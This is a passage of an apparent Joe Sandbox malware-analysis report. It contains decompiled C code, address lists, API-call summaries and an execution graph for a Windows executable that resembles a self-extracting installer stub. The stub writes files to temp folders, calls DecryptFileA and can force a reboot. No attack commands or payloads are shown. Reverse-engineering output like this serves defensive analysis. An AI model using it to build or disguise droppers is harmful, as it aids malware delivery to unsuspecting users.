						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}









                                                                                                                                                                                                                                                0x000565e8
                                                                                                                                                                                                                                                0x000565ed
                                                                                                                                                                                                                                                0x000565ef
                                                                                                                                                                                                                                                0x000565f2
                                                                                                                                                                                                                                                0x000565f4
                                                                                                                                                                                                                                                0x000565f4
                                                                                                                                                                                                                                                0x000565f6
                                                                                                                                                                                                                                                0x000565f7
                                                                                                                                                                                                                                                0x00056608
                                                                                                                                                                                                                                                0x00056611
                                                                                                                                                                                                                                                0x00056618
                                                                                                                                                                                                                                                0x0005661c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005660e
                                                                                                                                                                                                                                                0x00056623
                                                                                                                                                                                                                                                0x00056625
                                                                                                                                                                                                                                                0x0005663b
                                                                                                                                                                                                                                                0x0005663b
                                                                                                                                                                                                                                                0x0005663d
                                                                                                                                                                                                                                                0x00056641
                                                                                                                                                                                                                                                0x00056610
                                                                                                                                                                                                                                                0x00056610
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056610
                                                                                                                                                                                                                                                0x00056644
                                                                                                                                                                                                                                                0x00056647
                                                                                                                                                                                                                                                0x00056647
                                                                                                                                                                                                                                                0x00056621
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00052B33), ref: 00056602
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 00056612
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000), ref: 00056629
                                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 00056635
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Prev$Next
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3260447230-0
                                                                                                                                                                                                                                                • Opcode ID: 77d03316c04928ae45c1b049b13f93992d0ff550e472ed96b4e7d3c9e92a2869
                                                                                                                                                                                                                                                • Instruction ID: fa0e59623bab2be203042a18cc7f6f2bb39746cb97262e76bfbd6d0fff644cd8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77d03316c04928ae45c1b049b13f93992d0ff550e472ed96b4e7d3c9e92a2869
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77F02D311045506EE7321B284C888BBBFDCCF87357B59026FED9183101D61B0D0A8761
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000569B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000569B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x581f8 = E00056C70();
				__set_app_type(E00056FBE(2));
				 *0x588a4 =  *0x588a4 | 0xffffffff;
				 *0x588a8 =  *0x588a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x58528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x5851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00057000();
				if( *0x58000 == 0) {
					__setusermatherr(E00057000);
				}
				E000571EF(_t6);
				return 0;
			}








                                                                                                                                                                                                                                                0x000569b7
                                                                                                                                                                                                                                                0x000569c2
                                                                                                                                                                                                                                                0x000569c8
                                                                                                                                                                                                                                                0x000569cf
                                                                                                                                                                                                                                                0x000569d8
                                                                                                                                                                                                                                                0x000569de
                                                                                                                                                                                                                                                0x000569e4
                                                                                                                                                                                                                                                0x000569e6
                                                                                                                                                                                                                                                0x000569ec
                                                                                                                                                                                                                                                0x000569f2
                                                                                                                                                                                                                                                0x000569f4
                                                                                                                                                                                                                                                0x00056a00
                                                                                                                                                                                                                                                0x00056a07
                                                                                                                                                                                                                                                0x00056a0d
                                                                                                                                                                                                                                                0x00056a0e
                                                                                                                                                                                                                                                0x00056a15

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00056FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00056FC5
                                                                                                                                                                                                                                                • __set_app_type.MSVCRT ref: 000569C2
                                                                                                                                                                                                                                                • __p__fmode.MSVCRT ref: 000569D8
                                                                                                                                                                                                                                                • __p__commode.MSVCRT ref: 000569E6
                                                                                                                                                                                                                                                • __setusermatherr.MSVCRT ref: 00056A07
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1632413811-0
                                                                                                                                                                                                                                                • Opcode ID: be52f587542654b8e2325ae6091ea58c84528c2afb095cbfa56d9eeb6358502b
                                                                                                                                                                                                                                                • Instruction ID: cf55bc59190cd6b951bd0bedfaf7ce232362dfa48ca4cd3deb597f6e23dea73d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be52f587542654b8e2325ae6091ea58c84528c2afb095cbfa56d9eeb6358502b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04F0DA70508701CFE7586B34AD0F61B3BA1E705333B504619ED52962E1DF3E8548CB15
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:28.7%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:959
                                                                                                                                                                                                                                                Total number of Limit Nodes:24
                                                                                                                                                                                                                                                execution_graph 3119 26c03 3120 26c17 _exit 3119->3120 3121 26c1e 3119->3121 3120->3121 3122 26c27 _cexit 3121->3122 3123 26c32 3121->3123 3122->3123 2196 26f40 SetUnhandledExceptionFilter 2197 24cc0 GlobalFree 3124 24200 3125 2420b SendMessageA 3124->3125 3126 2421e 3124->3126 3125->3126 3127 23100 3128 231b0 3127->3128 3130 23111 3127->3130 3129 231b9 SendDlgItemMessageA 3128->3129 3132 23141 3128->3132 3129->3132 3133 23149 GetDesktopWindow 3130->3133 3134 2311d 3130->3134 3131 23138 EndDialog 3131->3132 3137 243d0 6 API calls 3133->3137 3134->3131 3134->3132 3138 24463 SetWindowPos 3137->3138 3140 26ce0 4 API calls 3138->3140 3141 2315d 6 API calls 3140->3141 3141->3132 3142 24bc0 3143 24c05 3142->3143 3145 24bd7 3142->3145 3144 24c1b SetFilePointer 3143->3144 3143->3145 3144->3145 3146 230c0 3147 230de CallWindowProcA 3146->3147 3148 230ce 3146->3148 3149 230da 3147->3149 3148->3147 3148->3149 3150 263c0 3151 26407 3150->3151 3152 2658a CharPrevA 3151->3152 3153 26415 CreateFileA 3152->3153 3154 26448 WriteFile 3153->3154 3155 2643a 3153->3155 3156 26465 CloseHandle 3154->3156 3158 26ce0 4 API calls 3155->3158 3156->3155 3159 2648f 3158->3159 2198 24ad0 2206 23680 2198->2206 2201 24ae9 2202 24aee WriteFile 2203 24b14 2202->2203 2204 24b0f 2202->2204 2203->2204 2205 24b3b SendDlgItemMessageA 2203->2205 2205->2204 2207 23691 MsgWaitForMultipleObjects 2206->2207 2208 236e8 2207->2208 2209 236a9 PeekMessageA 2207->2209 2208->2201 2208->2202 2209->2207 2210 236bc 2209->2210 2210->2207 2210->2208 2211 236c7 DispatchMessageA 2210->2211 2212 236d1 PeekMessageA 2210->2212 2211->2212 2212->2210 2213 24cd0 2214 24cf4 2213->2214 2215 24d0b 2213->2215 2216 24d02 2214->2216 2217 24b60 FindCloseChangeNotification 2214->2217 2215->2216 2219 24dcb 2215->2219 2222 24d25 2215->2222 2270 26ce0 2216->2270 2217->2216 2220 24dd4 SetDlgItemTextA 2219->2220 2223 24de3 2219->2223 2220->2223 2221 24e95 2222->2216 2236 24c37 2222->2236 2223->2216 2244 2476d 2223->2244 2227 24e38 2227->2216 2253 24980 2227->2253 2232 24e64 2261 247e0 LocalAlloc 2232->2261 2235 24e6f 2235->2216 2237 24c4c DosDateTimeToFileTime 2236->2237 2238 24c88 2236->2238 2237->2238 2239 24c5e LocalFileTimeToFileTime 2237->2239 2238->2216 2241 24b60 2238->2241 2239->2238 2240 24c70 SetFileTime 2239->2240 2240->2238 2242 24b92 FindCloseChangeNotification 2241->2242 2243 24b76 SetFileAttributesA 2241->2243 2242->2243 2243->2216 2275 266ae GetFileAttributesA 2244->2275 2246 2477b 2246->2227 2247 247cc SetFileAttributesA 2249 247db 2247->2249 2249->2227 2252 247c2 2252->2247 2254 24990 2253->2254 2255 249c2 lstrcmpA 2254->2255 2256 249a5 2254->2256 2258 249ba 2255->2258 2259 24a0e 2255->2259 2257 244b9 20 API calls 2256->2257 2257->2258 2258->2216 2258->2232 2259->2258 2341 2487a 2259->2341 2262 247f6 2261->2262 2263 2480f LocalAlloc 2261->2263 2264 244b9 20 API calls 2262->2264 2266 24831 2263->2266 2267 2480b 2263->2267 2264->2267 2268 244b9 20 API calls 2266->2268 2267->2235 2269 24846 LocalFree 2268->2269 2269->2267 2271 26ceb 2270->2271 2272 26ce8 2270->2272 2354 26cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2271->2354 2272->2221 2274 26e26 2274->2221 2276 24777 2275->2276 2276->2246 2276->2247 2277 26517 FindResourceA 2276->2277 2278 26536 LoadResource 2277->2278 2279 2656b 2277->2279 2278->2279 2280 26544 DialogBoxIndirectParamA FreeResource 2278->2280 2284 244b9 2279->2284 2280->2279 2283 247b1 2280->2283 2283->2247 2283->2249 2283->2252 2285 244fe LoadStringA 2284->2285 2288 2455a 2284->2288 2286 24562 2285->2286 2287 24527 2285->2287 2293 245c9 2286->2293 2299 2457e 2286->2299 2290 2681f 10 API calls 2287->2290 2289 26ce0 4 API calls 2288->2289 2291 24689 2289->2291 2292 2452c 2290->2292 2291->2283 2294 24536 MessageBoxA 2292->2294 2325 267c9 2292->2325 2296 24607 LocalAlloc 2293->2296 2297 245cd LocalAlloc 2293->2297 2294->2288 2296->2288 2307 245c4 2296->2307 2297->2288 2301 245f3 2297->2301 2299->2299 2303 24596 LocalAlloc 2299->2303 2304 2171e _vsnprintf 2301->2304 2302 2462d MessageBeep 2313 2681f 2302->2313 2303->2288 2306 245af 2303->2306 2304->2307 2331 2171e 2306->2331 2307->2302 2310 24645 MessageBoxA LocalFree 2310->2288 2311 267c9 EnumResourceLanguagesA 2311->2310 2314 26940 2313->2314 2315 26857 GetVersionExA 2313->2315 2316 26ce0 4 API calls 2314->2316 2317 2687c 2315->2317 2324 2691a 2315->2324 2318 2463b 2316->2318 2319 268a5 GetSystemMetrics 2317->2319 2317->2324 2318->2310 2318->2311 2320 268b5 RegOpenKeyExA 2319->2320 2319->2324 2321 268d6 RegQueryValueExA RegCloseKey 2320->2321 2320->2324 2322 2690c 2321->2322 2321->2324 2335 266f9 2322->2335 2324->2314 2326 267e2 2325->2326 2327 26803 2325->2327 2339 26793 EnumResourceLanguagesA 2326->2339 2327->2294 2329 267f5 2329->2327 2340 26793 EnumResourceLanguagesA 2329->2340 2332 2172d 2331->2332 2333 2173d _vsnprintf 2332->2333 2334 2175d 2332->2334 2333->2334 2334->2307 2336 2670f 2335->2336 2337 26740 CharNextA 2336->2337 2338 2674b 2336->2338 2337->2336 2338->2324 2339->2329 2340->2327 2342 248a2 CreateFileA 2341->2342 2344 24908 2342->2344 2345 248e9 2342->2345 2344->2258 2345->2344 2346 248ee 2345->2346 2349 2490c 2346->2349 2350 248f5 CreateFileA 2349->2350 2352 24917 2349->2352 2350->2344 2351 24962 CharNextA 2351->2352 2352->2350 2352->2351 2353 24953 CreateDirectoryA 2352->2353 2353->2351 2354->2274 3160 23210 3161 23227 3160->3161 3162 2328e EndDialog 3160->3162 3163 233e2 GetDesktopWindow 3161->3163 3164 23235 3161->3164 3178 23239 3162->3178 3166 243d0 11 API calls 3163->3166 3168 2324c 3164->3168 3169 232dd GetDlgItemTextA 3164->3169 3164->3178 3167 233f1 SetWindowTextA SendDlgItemMessageA 3166->3167 3170 2341f GetDlgItem EnableWindow 3167->3170 3167->3178 3172 23251 3168->3172 3173 232c5 EndDialog 3168->3173 3171 23366 3169->3171 3179 232fc 3169->3179 3170->3178 3177 244b9 20 API calls 3171->3177 3174 2325c LoadStringA 3172->3174 3172->3178 3173->3178 3175 23294 3174->3175 3176 2327b 3174->3176 3198 24224 LoadLibraryA 3175->3198 3182 244b9 20 API calls 3176->3182 3177->3178 3179->3171 3181 23331 GetFileAttributesA 3179->3181 3184 2333f 3181->3184 3185 2337c 3181->3185 3182->3162 3188 244b9 20 API calls 3184->3188 3187 2658a CharPrevA 3185->3187 3186 232a5 SetDlgItemTextA 3186->3176 3186->3178 3189 2338d 3187->3189 3190 23351 3188->3190 3191 258c8 27 API calls 3189->3191 3190->3178 3192 2335a CreateDirectoryA 3190->3192 3193 23394 3191->3193 3192->3171 3192->3185 3193->3171 3194 233a4 3193->3194 3195 233c7 EndDialog 3194->3195 3196 2597d 34 API calls 3194->3196 3195->3178 3197 233c3 3196->3197 3197->3178 3197->3195 3199 243b2 3198->3199 3200 24246 GetProcAddress 3198->3200 3204 244b9 20 API calls 3199->3204 3201 243a4 FreeLibrary 3200->3201 3202 2425d GetProcAddress 3200->3202 3201->3199 3202->3201 3203 24274 GetProcAddress 3202->3203 3203->3201 3205 2428b 3203->3205 3206 2329d 3204->3206 3207 24295 GetTempPathA 3205->3207 3211 242e1 3205->3211 3206->3178 3206->3186 3208 242ad 3207->3208 3208->3208 3209 242b4 CharPrevA 3208->3209 3210 242d0 CharPrevA 3209->3210 3209->3211 3210->3211 3212 24390 FreeLibrary 3211->3212 3212->3206 3213 24a50 3214 24a66 3213->3214 3215 24a9f ReadFile 3213->3215 3216 24abb 3214->3216 3217 24a82 memcpy 3214->3217 3215->3216 3217->3216 3218 23450 3219 234d3 EndDialog 3218->3219 3220 2345e 3218->3220 3221 2346a 3219->3221 3222 2349a GetDesktopWindow 3220->3222 3226 23465 3220->3226 3223 243d0 11 API calls 3222->3223 3224 234ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3223->3224 3224->3221 3225 2348c EndDialog 3225->3221 3226->3221 3226->3225 2355 24ca0 GlobalAlloc 2356 26a60 2373 27155 2356->2373 2358 26a65 2359 26a76 GetStartupInfoW 2358->2359 2360 26a93 2359->2360 2361 26aa8 2360->2361 2362 26aaf Sleep 2360->2362 2363 26ac7 _amsg_exit 2361->2363 2366 26ad1 2361->2366 2362->2360 2363->2366 2364 26b13 _initterm 2365 26b2e __IsNonwritableInCurrentImage 2364->2365 2368 26bd6 _ismbblead 2365->2368 2369 26c1e 2365->2369 2372 26bbe exit 2365->2372 2378 22bfb GetVersion 2365->2378 2366->2364 2366->2365 2367 26af4 2366->2367 2368->2365 2369->2367 2370 26c27 _cexit 2369->2370 2370->2367 2372->2365 2374 2717a 2373->2374 2375 2717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2375 2374->2375 2376 271e2 2374->2376 2377 271cd 2375->2377 2376->2358 2377->2376 2379 22c50 2378->2379 2380 22c0f 2378->2380 2395 22caa memset memset memset 2379->2395 2380->2379 2381 22c13 GetModuleHandleW 2380->2381 2381->2379 2383 22c22 GetProcAddress 2381->2383 2383->2379 2392 22c34 2383->2392 2385 22c8e 2386 22c97 CloseHandle 2385->2386 2387 22c9e 2385->2387 2386->2387 2387->2365 2392->2379 2393 22c89 2489 21f90 2393->2489 2506 2468f FindResourceA SizeofResource 2395->2506 2398 22ef3 2401 244b9 20 API calls 2398->2401 2399 22d2d CreateEventA SetEvent 2400 2468f 7 API calls 2399->2400 2402 22d57 2400->2402 2403 22d6e 2401->2403 2404 22d5b 2402->2404 2406 22e1f 2402->2406 2409 2468f 7 API calls 2402->2409 2407 26ce0 4 API calls 2403->2407 2405 244b9 20 API calls 2404->2405 2405->2403 2511 25c9e 2406->2511 2410 22c62 2407->2410 2412 22d9f 2409->2412 2410->2385 2436 22f1d 2410->2436 2412->2404 2413 22da3 CreateMutexA 2412->2413 2413->2406 2416 22dbd GetLastError 2413->2416 2414 22e30 2414->2398 2415 22e3a 2417 22e52 FindResourceA 2415->2417 2418 22e43 2415->2418 2416->2406 2420 22dca 2416->2420 2421 22e64 LoadResource 2417->2421 2422 22e6e 2417->2422 2537 22390 2418->2537 2423 22dd5 2420->2423 2424 22dea 2420->2424 2421->2422 2427 22e4d 2422->2427 2552 236ee GetVersionExA 2422->2552 2425 244b9 20 API calls 2423->2425 2426 244b9 20 API calls 2424->2426 2428 22de8 2425->2428 2429 22dff 2426->2429 2427->2403 2431 22e04 CloseHandle 2428->2431 2429->2406 2429->2431 2431->2403 2435 26517 24 API calls 2435->2427 2437 22f3f 2436->2437 2438 22f6c 2436->2438 2440 22f5f 2437->2440 2641 251e5 2437->2641 2660 25164 2438->2660 2788 23a3f 2440->2788 2441 22f71 2472 2303c 2441->2472 2673 255a0 2441->2673 2448 26ce0 4 API calls 2450 22c6b 2448->2450 2449 22f86 GetSystemDirectoryA 2451 2658a CharPrevA 2449->2451 2476 252b6 2450->2476 2452 22fab LoadLibraryA 2451->2452 2453 22fc0 GetProcAddress 2452->2453 2454 22ff7 FreeLibrary 2452->2454 2453->2454 2455 22fd6 DecryptFileA 2453->2455 2456 23006 2454->2456 2457 23017 SetCurrentDirectoryA 2454->2457 2455->2454 2465 22ff0 2455->2465 2456->2457 2721 2621e GetWindowsDirectoryA 2456->2721 2458 23026 2457->2458 2459 23054 2457->2459 2461 244b9 20 API calls 2458->2461 2471 23061 2459->2471 2731 23b26 2459->2731 2464 23037 2461->2464 2807 26285 GetLastError 2464->2807 2465->2454 2468 23098 2468->2472 2474 230af 2468->2474 2469 2307a 2469->2468 2751 23ba2 2469->2751 2471->2469 2471->2472 2740 2256d 2471->2740 2472->2448 2809 24169 2474->2809 2477 252d6 2476->2477 2485 25316 2476->2485 2480 25300 LocalFree LocalFree 2477->2480 2481 252eb SetFileAttributesA DeleteFileA 2477->2481 2478 25374 2479 2538c 2478->2479 3115 21fe1 2478->3115 2482 26ce0 4 API calls 2479->2482 2480->2477 2480->2485 2481->2480 2484 22c72 2482->2484 2484->2385 2484->2393 2485->2478 2486 2535e SetCurrentDirectoryA 2485->2486 2487 265e8 4 API calls 2485->2487 2488 22390 13 API calls 2486->2488 2487->2486 2488->2478 2490 21f9f 2489->2490 2491 21f9a 2489->2491 2493 21fc0 2490->2493 2494 244b9 20 API calls 2490->2494 2498 21fd9 2490->2498 2492 21ea7 15 API calls 2491->2492 2492->2490 2495 21ee2 GetCurrentProcess OpenProcessToken 2493->2495 2496 21fcf ExitWindowsEx 2493->2496 2493->2498 2494->2493 2499 21f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2495->2499 2500 21f0e 2495->2500 2496->2498 2498->2385 2499->2500 2501 21f6b ExitWindowsEx 2499->2501 2503 244b9 20 API calls 2500->2503 2501->2500 2502 21f1f 2501->2502 2504 26ce0 4 API calls 2502->2504 2503->2502 2505 21f8c 2504->2505 2505->2385 2507 22d1a 2506->2507 2508 246b6 2506->2508 2507->2398 2507->2399 2508->2507 2509 246be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 246df memcpy_s FreeResource 2509->2510 2510->2507 2517 25e17 2511->2517 2534 25cc3 2511->2534 2512 26ce0 4 API calls 2513 22e2c 2512->2513 2513->2414 2513->2415 2514 25ced CharNextA 2514->2534 2515 25dec GetModuleFileNameA 2516 25e0a 2515->2516 2515->2517 2587 266c8 2516->2587 2517->2512 2519 26218 2596 26e2a 2519->2596 2522 25dd0 2522->2515 2522->2517 2523 25e36 CharUpperA 2524 261d0 2523->2524 2523->2534 2525 244b9 20 API calls 2524->2525 2526 261e7 2525->2526 2527 261f0 CloseHandle 2526->2527 2528 261f7 ExitProcess 2526->2528 2527->2528 2529 25f9f CharUpperA 2529->2534 2530 25f59 CompareStringA 2530->2534 2531 26003 CharUpperA 2531->2534 2532 25edc CharUpperA 2532->2534 2533 260a2 CharUpperA 2533->2534 2534->2514 2534->2517 2534->2519 2534->2522 2534->2523 2534->2529 2534->2530 2534->2531 2534->2532 2534->2533 2536 2667f IsDBCSLeadByte CharNextA 2534->2536 2592 2658a 2534->2592 2536->2534 2538 224cb 2537->2538 2541 223b9 2537->2541 2539 26ce0 4 API calls 2538->2539 2540 224dc 2539->2540 2540->2427 2541->2538 2542 223e9 FindFirstFileA 2541->2542 2542->2538 2550 22407 2542->2550 2543 22421 lstrcmpA 2545 22431 lstrcmpA 2543->2545 2546 224a9 FindNextFileA 2543->2546 2544 22479 2547 22488 SetFileAttributesA DeleteFileA 2544->2547 2545->2546 2545->2550 2548 224bd FindClose RemoveDirectoryA 2546->2548 2546->2550 2547->2546 2548->2538 2549 2658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2546 2550->2549 2551 22390 5 API calls 2550->2551 2551->2550 2556 23737 2552->2556 2557 2372d 2552->2557 2553 244b9 20 API calls 2566 239fc 2553->2566 2554 26ce0 4 API calls 2555 22e92 2554->2555 2555->2403 2555->2427 2567 218a3 2555->2567 2556->2557 2559 238a4 2556->2559 2556->2566 2603 228e8 2556->2603 2557->2553 2557->2566 2559->2557 2560 239c1 MessageBeep 2559->2560 2559->2566 2561 2681f 10 API calls 2560->2561 2562 239ce 2561->2562 2563 239d8 MessageBoxA 2562->2563 2564 267c9 EnumResourceLanguagesA 2562->2564 2563->2566 2564->2563 2566->2554 2568 218d5 2567->2568 2575 219b8 2567->2575 2632 217ee LoadLibraryA 2568->2632 2570 26ce0 4 API calls 2572 219d5 2570->2572 2572->2427 2572->2435 2573 218e5 GetCurrentProcess OpenProcessToken 2574 21900 GetTokenInformation 2573->2574 2573->2575 2576 219aa CloseHandle 2574->2576 2577 21918 GetLastError 2574->2577 2575->2570 2576->2575 2577->2576 2578 21927 LocalAlloc 2577->2578 2579 21938 GetTokenInformation 2578->2579 2580 219a9 2578->2580 2581 219a2 LocalFree 2579->2581 2582 2194e AllocateAndInitializeSid 2579->2582 2580->2576 2581->2580 2582->2581 2585 2196e 2582->2585 2583 21999 FreeSid 2583->2581 2584 21975 EqualSid 2584->2585 2586 2198c 2584->2586 2585->2583 2585->2584 2585->2586 2586->2583 2588 266d5 2587->2588 2589 266f3 2588->2589 2591 266e5 CharNextA 2588->2591 2599 26648 2588->2599 2589->2517 2591->2588 2593 2659b 2592->2593 2593->2593 2594 265b8 CharPrevA 2593->2594 2595 265ab 2593->2595 2594->2595 2595->2534 2602 26cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 2621d 2600 2665d IsDBCSLeadByte 2599->2600 2601 26668 2599->2601 2600->2601 2601->2588 2602->2598 2604 22a62 2603->2604 2611 2290d 2603->2611 2605 22a75 2604->2605 2606 22a6e GlobalFree 2604->2606 2605->2559 2606->2605 2608 22955 GlobalAlloc 2608->2604 2609 22968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 22a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 22a80 GlobalUnlock 2611->2612 2613 22773 2611->2613 2612->2604 2614 228b2 2613->2614 2615 227a3 CharUpperA CharNextA CharNextA 2613->2615 2616 228b7 GetSystemDirectoryA 2614->2616 2615->2616 2617 227db 2615->2617 2620 228bf 2616->2620 2618 227e3 2617->2618 2619 228a8 GetWindowsDirectoryA 2617->2619 2625 2658a CharPrevA 2618->2625 2619->2620 2621 228d2 2620->2621 2623 2658a CharPrevA 2620->2623 2622 26ce0 4 API calls 2621->2622 2624 228e2 2622->2624 2623->2621 2624->2611 2626 22810 RegOpenKeyExA 2625->2626 2626->2620 2627 22837 RegQueryValueExA 2626->2627 2628 2289a RegCloseKey 2627->2628 2629 2285c 2627->2629 2628->2620 2630 22867 ExpandEnvironmentStringsA 2629->2630 2631 2287a 2629->2631 2630->2631 2631->2628 2633 21890 2632->2633 2634 21826 GetProcAddress 2632->2634 2637 26ce0 4 API calls 2633->2637 2635 21889 FreeLibrary 2634->2635 2636 21839 AllocateAndInitializeSid 2634->2636 2635->2633 2636->2635 2640 2185f FreeSid 2636->2640 2638 2189f 2637->2638 2638->2573 2638->2575 2640->2635 2642 2468f 7 API calls 2641->2642 2643 251f9 LocalAlloc 2642->2643 2644 2522d 2643->2644 2645 2520d 2643->2645 2647 2468f 7 API calls 2644->2647 2646 244b9 20 API calls 2645->2646 2648 2521e 2646->2648 2649 2523a 2647->2649 2650 26285 GetLastError 2648->2650 2651 25262 lstrcmpA 2649->2651 2652 2523e 2649->2652 2659 22f4d 2650->2659 2654 25272 LocalFree 2651->2654 2655 2527e 2651->2655 2653 244b9 20 API calls 2652->2653 2656 2524f LocalFree 2653->2656 2654->2659 2657 244b9 20 API calls 2655->2657 2656->2659 2658 25290 LocalFree 2657->2658 2658->2659 2659->2438 2659->2440 2659->2472 2661 2468f 7 API calls 2660->2661 2662 25175 2661->2662 2663 2517a 2662->2663 2664 251af 2662->2664 2666 244b9 20 API calls 2663->2666 2665 2468f 7 API calls 2664->2665 2667 251c0 2665->2667 2672 2518d 2666->2672 2822 26298 2667->2822 2670 251e1 2670->2441 2671 244b9 20 API calls 2671->2672 2672->2441 2674 2468f 7 API calls 2673->2674 2675 255c7 LocalAlloc 2674->2675 2676 255db 2675->2676 2677 255fd 2675->2677 2679 244b9 20 API calls 2676->2679 2678 2468f 7 API calls 2677->2678 2681 2560a 2678->2681 2680 255ec 2679->2680 2682 26285 GetLastError 2680->2682 2683 25632 lstrcmpA 2681->2683 2684 2560e 2681->2684 2710 255f1 2682->2710 2686 25645 2683->2686 2687 2564b LocalFree 2683->2687 2685 244b9 20 API calls 2684->2685 2688 2561f LocalFree 2685->2688 2686->2687 2689 25696 2687->2689 2690 2565b 2687->2690 2688->2710 2691 2589f 2689->2691 2694 256ae GetTempPathA 2689->2694 2695 25467 49 API calls 2690->2695 2692 26517 24 API calls 2691->2692 2692->2710 2693 26ce0 4 API calls 2696 22f7e 2693->2696 2697 256eb 2694->2697 2698 256c3 2694->2698 2699 25678 2695->2699 2696->2449 2696->2472 2703 25717 GetDriveTypeA 2697->2703 2704 2586c GetWindowsDirectoryA 2697->2704 2697->2710 2834 25467 2698->2834 2702 244b9 20 API calls 2699->2702 2699->2710 2702->2710 2705 25730 GetFileAttributesA 2703->2705 2719 2572b 2703->2719 2868 2597d GetCurrentDirectoryA SetCurrentDirectoryA 2704->2868 2705->2719 2709 2597d 34 API calls 2709->2719 2710->2693 2711 25467 49 API calls 2711->2697 2712 22630 21 API calls 2712->2719 2714 257c1 GetWindowsDirectoryA 2714->2719 2715 2658a CharPrevA 2716 257e8 GetFileAttributesA 2715->2716 2717 257fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 25827 SetFileAttributesA 2718->2719 2719->2703 2719->2704 2719->2705 2719->2709 2719->2710 2719->2712 2719->2714 2719->2715 2719->2718 2720 25467 49 API calls 2719->2720 2864 26952 2719->2864 2720->2719 2722 26268 2721->2722 2723 26249 2721->2723 2724 2597d 34 API calls 2722->2724 2725 244b9 20 API calls 2723->2725 2730 2625f 2724->2730 2726 2625a 2725->2726 2728 26285 GetLastError 2726->2728 2727 26ce0 4 API calls 2729 23013 2727->2729 2728->2730 2729->2457 2729->2472 2730->2727 2732 23b2d 2731->2732 